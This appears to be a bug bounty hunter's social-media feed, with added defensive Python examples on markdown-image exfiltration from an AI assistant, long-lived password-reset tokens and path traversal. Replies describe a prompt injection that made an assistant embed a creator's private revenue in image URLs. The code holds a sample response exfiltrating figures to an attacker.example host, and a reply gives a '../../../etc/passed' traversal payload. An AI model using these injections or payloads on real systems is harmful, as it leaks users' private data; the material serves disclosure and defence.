Rand0m_Unk0wn
18 posts


$13,337 Google Bug Bounty
1-click OAuth client takeover through henhouse UI by rand0m_unk0wn
👨💻 rand0m_unk0wn
🔗 random-unknown-username.github.io/random-unknown…

@javoriuski Also, if you need the metrics exfil as impact for a possible re-evaluation, I have video PoCs showing exploitation from the time it wasn't fixed. DM me if you'd like.

@javoriuski Great bug, also I think my report got duped to this! I had reported the exact same markdown exfil of all user data like channel revenue and metrics. Great bug.
I would have suggested you try markdown-based image URLs, so that a GET request is issued with the user data in it.

Leaking YouTube Creators Private Videos
javoriuski.com/post/youtube

@javoriuski Like in the YT comment, I told the AI to automatically change the parameters in the markdown image URL (revenue etc.) based on the channel metrics.
But now askstudio doesn't render any markdown.

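The two replies above describe the same channel: an assistant UI that renders markdown lets an injected instruction turn private figures into the query string of an image URL, and the victim's browser then issues the GET that carries them out. The script below is an added example, not code from the report or from the affected product; the hosts, the channel figures and the assistant text are constructed. It shows what a renderer would fetch, which of those fetches carry data, and one mitigation (first-party image hosts only, no query strings), which is a stricter version of the "stop rendering markdown" fix the second reply mentions.

```python
"""Markdown-image exfiltration in an LLM assistant UI, and one mitigation.
Constructed example: hosts, figures and assistant text are made up."""
import re
from urllib.parse import urlsplit

# Assumption: the UI renders the assistant's markdown (and raw <img> tags),
# so every image it emits becomes a GET from the victim's browser.
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?(?:\s+"[^"]*")?\s*\)')
HTML_IMG = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>', re.I)

# Constructed assistant output: the model followed an injected instruction
# and placed private channel metrics into the query string of an image URL.
INJECTED_RESPONSE = (
    "Here is your summary.\n\n"
    "![stats](https://collector.attacker.example/p.png?revenue=12345&views=987654)\n"
    '<img src="https://collector.attacker.example/x.gif?sub=4321">\n'
    "![logo](https://cdn.example-studio.com/logo.png)\n"
)


def extract_image_urls(markdown: str) -> list:
    """Every image URL the renderer would fetch, markdown or raw HTML."""
    urls = [m.group(2) for m in MD_IMAGE.finditer(markdown)]
    urls += [m.group(1) for m in HTML_IMG.finditer(markdown)]
    return urls


def exfil_candidates(markdown: str) -> list:
    """Images whose URL carries data (query or fragment): rendering them
    leaks that data with no click from the victim."""
    out = []
    for url in extract_image_urls(markdown):
        parts = urlsplit(url)
        if parts.query or parts.fragment:
            out.append(url)
    return out


def sanitize_images(markdown: str, allowed_hosts: frozenset) -> tuple:
    """Mitigation: keep images only from allow-listed https hosts and only
    without a query string; anything else collapses to its alt text.
    Returns (cleaned_markdown, blocked_urls)."""
    blocked = []

    def keep(url: str) -> bool:
        p = urlsplit(url)
        return (p.scheme == "https" and p.hostname in allowed_hosts
                and not p.query and not p.fragment)

    def md_sub(m):
        alt, url = m.group(1), m.group(2)
        if keep(url):
            return m.group(0)
        blocked.append(url)
        return alt

    def html_sub(m):
        url = m.group(1)
        if keep(url):
            return m.group(0)
        blocked.append(url)
        return ""

    cleaned = MD_IMAGE.sub(md_sub, markdown)
    cleaned = HTML_IMG.sub(html_sub, cleaned)
    return cleaned, blocked


if __name__ == "__main__":
    print("renderer would fetch:", extract_image_urls(INJECTED_RESPONSE))
    print("exfil channel:", exfil_candidates(INJECTED_RESPONSE))
    cleaned, blocked = sanitize_images(
        INJECTED_RESPONSE, frozenset({"cdn.example-studio.com"}))
    print("blocked:", blocked)
    print(cleaned)
```

The regexes cover the common markdown and HTML image syntaxes only; a real renderer should apply the allow-list in its own AST walk (reference-style images, nested links and HTML entities are not handled here), and a Content-Security-Policy `img-src` limited to the same hosts gives a second layer if the sanitizer misses a form.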
@_jensec My brain, with any proxy and cURL; even DevTools works.

random-unknown-username.github.io/random-unknown…
Write-up for my first bounty ($13k), Google Cloud VRP.
It can be a bit confusing; it's my first time doing a write-up.
Feedback would be much appreciated :)

@mrgc41637186182 @thedawgyg For the Chrome team I have usually seen a first reply within 24 hours on business days, and yeah, on Meta the first reply I got, a few days ago, was after 3 months.

@randomunkn36565 @thedawgyg So, do you know what the Chrome team’s average response time is these days? Are you aware of the response times for other high-profile bug bounty programs?

@wadgamaraldeen Programs usually consider it the user's mistake for using unsafe things like third-party extensions etc., which allow the user's data to be indexed, and mostly do not pay for bugs like this, because it's the user's mistake, even though they could have built the app securely using POST requests.

In another private BBP, 💀 a zero-click ATO vulnerability caused by publicly archived password reset links with long-lived tokens.
One valid link → instant full account access. No OTP. No victim interaction.
Mass impact potential across multiple tenants.
Now we wait 🔥🐞 #BugBounty

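The post above names the failure mode (a reset link that stays valid long after it was issued and can be replayed by whoever finds it in a public archive) without showing the token handling behind it. The code below is an added example, not code from the affected program: a minimal store with the long-lived, reusable token beside a hardened one (short TTL, single use, hashed at rest, voided on password change). The 15-minute TTL, the user ids and the injected clock are assumptions for the demo.

```python
"""Password-reset tokens: the long-lived reusable design beside a hardened one.
Constructed example with an injected clock; not the affected program's code."""
import hashlib
import secrets
from dataclasses import dataclass
from typing import Optional

RESET_TTL_SECONDS = 15 * 60  # assumption: a 15-minute window is typical


class LegacyResetStore:
    """The failure mode: the token never expires and is never consumed, so a
    link that ends up in a public archive works whenever it is replayed."""

    def __init__(self):
        self._tokens = {}  # raw token -> user id (also readable from a DB dump)

    def issue(self, user_id: str) -> str:
        token = secrets.token_urlsafe(32)
        self._tokens[token] = user_id
        return token

    def redeem(self, token: str, now: float) -> Optional[str]:
        return self._tokens.get(token)  # no expiry, no single-use check


@dataclass
class _Pending:
    user_id: str
    expires_at: float
    used: bool = False


class HardenedResetStore:
    """Short TTL, single use, only a hash stored, and every outstanding link
    for a user is voided when a new one is issued or the password changes."""

    def __init__(self, ttl: float = RESET_TTL_SECONDS):
        self._ttl = ttl
        self._pending = {}  # sha256(token) -> _Pending

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def _void_all(self, user_id: str) -> None:
        for rec in self._pending.values():
            if rec.user_id == user_id:
                rec.used = True

    def issue(self, user_id: str, now: float) -> str:
        self._void_all(user_id)  # an older link must not stay valid alongside the new one
        token = secrets.token_urlsafe(32)  # 256 bits of entropy; never logged
        self._pending[self._digest(token)] = _Pending(user_id, now + self._ttl)
        return token

    def redeem(self, token: str, now: float) -> Optional[str]:
        rec = self._pending.get(self._digest(token))
        if rec is None or rec.used or now > rec.expires_at:
            return None
        rec.used = True  # single use: replaying the archived link now fails
        return rec.user_id

    def on_password_changed(self, user_id: str) -> None:
        self._void_all(user_id)


def demo() -> dict:
    """Replay an 'archived' link against both stores with a fixed clock."""
    now = 1_700_000_000.0
    legacy = LegacyResetStore()
    archived_link = legacy.issue("user-42")  # imagine this URL was crawled and archived
    hardened = HardenedResetStore()
    fresh = hardened.issue("user-42", now)
    stale = hardened.issue("user-43", now)
    return {
        "legacy_replay_after_30_days": legacy.redeem(archived_link, now + 30 * 86400),
        "hardened_first_use": hardened.redeem(fresh, now + 60),
        "hardened_replay": hardened.redeem(fresh, now + 120),
        "hardened_expired": hardened.redeem(stale, now + RESET_TTL_SECONDS + 1),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

Storing only the digest means a database read does not hand out live links, and voiding on issue or password change closes the window where an old link in someone's mailbox (or an archive) still works. Triage on the program side reduces to the same checks: does the link expire, does it die after one use, and does changing the password kill it.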
@hamidonsolo I'm 15 and closing this year at $30k :), not joking bughunters.google.com/profile/0d778c…

I don't run automated scanners and pray.
Everyone wants the $10K months. Nobody wants to spend 6 hours reading JavaScript understanding how one feature passes data to another.
I read the code. I trace the logic. I click every button. I test the feature nobody thinks is interesting. I sit with one application for weeks until I understand it better than the developers who built it.
That's how you go from "no bugs found" to:
→ Top 10 on Netlify. 16 reports submitted.
→ #1 on Temu. 8 reports submitted.
→ High and Critical severity bugs dropping in the same night.
Automation finds the easy stuff. The stuff 50 other hunters already reported. The duplicates.
Manual hunting finds the chains. The logic flaws. The bugs that make engineers say "how did you even find this."
I'm 19. I don't have 10 years of experience. I don't have fancy tools. I have patience and my browser.
That's enough.
Deep dive > wide scan. Every time.

@hshagshsu @Behi_Sec Can't tell much; I have resent the bug for reconsideration for more bounty, but it's something something tier 1 asset.

Weekly Update: 🗓️
- Gained 5 more customers for VibeSec.sh, bringing my total to 10.
- Earned a $12,000 bounty from Google.
- Finally figured out how to automate my workflow using OpenClaw effectively.
What did you do this week?

@Bugcrowd ?file=../../../etc/passed
The argument is parsed directly as the file path, with no checks for .. sequences, leading to path traversal.

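The reply above names the bug class (the ?file= value joined straight onto a directory with no check for ..) but does not show the fix. The script below is an added example, not code from the Bugcrowd challenge: the unchecked join beside a containment check that resolves the candidate path and rejects anything outside the document root. The directory layout (a public/ folder with a secret file one level up standing in for /etc/passwd) is constructed in a temporary directory so it runs anywhere.

```python
"""Path traversal through an unchecked ?file= parameter, and the fix.
Constructed example; the temp-dir layout stands in for a real web root."""
import os
import tempfile
from pathlib import Path


def serve_file_vulnerable(base_dir: str, requested: str) -> bytes:
    """The bug: the query value is joined onto the base directory as-is, so
    '../' walks out of it (and an absolute path replaces it entirely)."""
    with open(os.path.join(base_dir, requested), "rb") as fh:
        return fh.read()


def resolve_under_base(base_dir: str, requested: str) -> Path:
    """Hardened: refuse absolute paths and NUL bytes, resolve the candidate
    (this normalises '..', './' and symlinks, and %2e%2e once URL-decoded),
    then require the result to sit inside the resolved base directory."""
    base = Path(base_dir).resolve()
    if Path(requested).is_absolute() or "\x00" in requested:
        raise PermissionError("absolute path or NUL byte rejected")
    target = (base / requested).resolve()
    if target != base and base not in target.parents:
        raise PermissionError(f"{requested!r} escapes {base}")
    return target


def serve_file_safe(base_dir: str, requested: str) -> bytes:
    return resolve_under_base(base_dir, requested).read_bytes()


def _attempt(base_dir: str, requested: str) -> str:
    try:
        serve_file_safe(base_dir, requested)
        return "served"
    except PermissionError:
        return "blocked"


def demo() -> dict:
    """Build a tiny web root and hit both versions with the traversal payload."""
    root = tempfile.mkdtemp()
    public = os.path.join(root, "public")
    os.makedirs(public)
    Path(public, "index.html").write_bytes(b"<h1>hello</h1>")
    Path(root, "secret.txt").write_bytes(b"root:x:0:0")  # stands in for /etc/passwd
    return {
        "vuln_index": serve_file_vulnerable(public, "index.html"),
        "vuln_traversal": serve_file_vulnerable(public, "../secret.txt"),  # leaks
        "safe_index": serve_file_safe(public, "index.html"),
        "safe_traversal": _attempt(public, "../secret.txt"),
        "safe_nested": _attempt(public, "./sub/../../secret.txt"),
        "safe_absolute": _attempt(public, os.path.join(root, "secret.txt")),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

Checking the resolved path against the resolved base, rather than scanning the input for the two characters "..", is what makes the check hold for encoded variants, mixed separators and symlinks; a denylist on the raw string is the pattern that keeps getting bypassed.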
@ndevtk Just wanted to say, the app's amazing! It just sometimes crashes when analysing huge apps, but otherwise it's amazing. I have one suggestion: maybe add something that allows you to build a PoC easily. This app made it really easy for me to get into Android bug hunting.

@thedawgyg I'm just trying to start getting into fuzzing from a more web2 profile.

@thedawgyg Hey, can you please share some resources on fuzzing Chrome specifically? The thousands of subsystems make it quite confusing. The Blink engine and V8 already have Domato and Fuzzilli, so are they better than AFL or maybe libFuzzer? And any suggestion on what part to fuzz?